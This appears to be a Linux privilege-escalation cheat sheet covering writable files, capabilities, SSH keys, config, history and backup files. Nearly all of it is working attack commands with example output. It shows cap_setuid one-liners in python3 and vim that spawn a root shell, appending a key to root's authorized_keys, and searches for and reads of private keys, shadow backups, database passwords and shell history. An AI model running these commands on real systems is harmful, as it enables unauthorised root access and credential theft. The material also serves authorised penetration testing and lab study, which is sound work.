FILE PERMISSIONS & CAPABILITIES

World-writable files

Files anyone can modify — Config files, scripts, binaries

find / -writable -type f 2>/dev/null | grep -v proc
Example Output
find / -writable -type f 2>/dev/null
/etc/passwd         <- can add root user!
/opt/app/config.py  <- can inject code
/var/www/html/index.php <- can add webshell

World-writable directories

Directories anyone can write to — Drop files for path hijack

find / -writable -type d 2>/dev/null
Example Output
find / -writable -type d 2>/dev/null
/tmp
/var/tmp
/opt/app/plugins/  <- can drop files here
/usr/local/bin/    <- PATH hijack possible

Linux capabilities

Capabilities on binaries — cap_setuid = instant root

getcap -r / 2>/dev/null
Example Output
getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep  <- instant root!
/usr/bin/ping = cap_net_raw+ep    <- normal, ignore

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root

Capability abuse

GTFOBins for capabilities too — Capabilities are like mini-SUID

python3 with cap_setuid:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Example Output
getcap shows: /usr/bin/python3 = cap_setuid+ep

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
root

OR: /usr/bin/vim = cap_setuid+ep
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh","sh")'

SSH keys

Private keys for other users — SSH as root or other user

find / -name 'id_rsa' -o -name 'authorized_keys' -o -name '*.pem' 2>/dev/null
ls -la /home/*/.ssh/
ls -la /root/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa
/root/.ssh/id_rsa  <- root's key!
/opt/backups/.ssh/id_rsa

find / -name authorized_keys -writable 2>/dev/null
/root/.ssh/authorized_keys  <- WRITABLE!
echo 'your_pub_key' >> /root/.ssh/authorized_keys
ssh root@localhost
(Write your key = root SSH access)

Readable config files

Database passwords, API keys — Password reuse is common

find / -name '*.conf' -readable 2>/dev/null
find / -name '*.config' -readable 2>/dev/null
find / -name 'wp-config*' 2>/dev/null
Example Output
find / -name '*.conf' -readable 2>/dev/null
/etc/apache2/sites-enabled/000-default.conf
/var/www/html/wp-config.php

cat wp-config.php:
define('DB_PASSWORD', 'WordPressDBp@ss!');
(Database credentials)

History files

Previous commands — May contain typed passwords

cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
cat ~/.mysql_history
Example Output
cat /home/admin/.bash_history
mysql -u root -p'S3cretDBP@ss'
ssh root@10.10.10.20
sudo su - backup_user
(Passwords typed in commands)

Backup files

Backup files with old configs — Old passwords, keys

find / -name '*.bak' -o -name '*.old' -o -name '*.backup' -o -name '*.zip' -o -name '*.tar.gz' 2>/dev/null
Example Output
find / -name '*.bak' -o -name '*.old' 2>/dev/null
/var/backups/shadow.bak  <- old shadow file!
/opt/config.old  <- old config with passwords

cat /var/backups/shadow.bak
root:$6$oldhash...

/opt and /srv

Custom installed applications — Often misconfigured

ls -la /opt/
ls -la /srv/
Example Output
ls -la /opt/
drwxrwxrwx  admin app_v2/  <- writable custom app!
-rwsr-xr-x  root  monitor  <- SUID custom binary!

ls -la /srv/
drwxr-xr-x  root  web/  <- alternative web root